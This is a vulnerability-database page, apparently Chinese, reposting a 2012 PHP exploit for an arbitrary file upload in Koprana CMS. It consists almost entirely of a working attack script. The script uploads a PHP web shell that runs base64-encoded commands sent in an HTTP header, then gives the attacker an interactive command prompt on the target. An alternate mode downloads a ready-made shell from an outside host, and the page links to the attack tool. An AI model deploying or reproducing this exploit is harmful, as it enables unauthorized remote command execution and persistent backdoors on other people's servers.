Koprana CMS Shell Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047712 漏洞类型
发布时间 2012-04-12 更新时间 2012-04-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040102
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
//       - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/* 
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit

!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode 
 */
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $port,$packet)
{
    if (!($sock = fsockopen($host, $port)))
        die("\n[-] No response from {$host}:{$port}\n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS Remote Upload Exploit                                   |";
print "\n|                                by The UnKn0wN                       |";
print "\n|     Greets to : The Crazy3D members and all Algerian h4x0rs         |";
print "\n+---------------------------------------------------------------------+";
print "\n|           www.Dofus-Exploit.com | WwW.IzzI-Hack.com                 |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path> <mode>\n";
    print "\nExample....: php $argv[0] localhost / 1";
    print "\nExample....: php $argv[0] localhost /site/ 2\n";
    die();
}

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];

$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)

if($mode == "2") $shell = $shell2;

$boundary = "---------".str_replace(".", "", microtime());
$payload  = "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";

$packet  = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";

http_send($host,$port, $packet);
if($mode == "1") {

$packet  = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n");
print "[+]Backdoor was upload!\n[+]Getting the shell...\n"; 
while(1)
{
    print "\nBHR@{$host}# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}
}else
	print "Go to {$host}{$path}sh.php to check.\n";

?>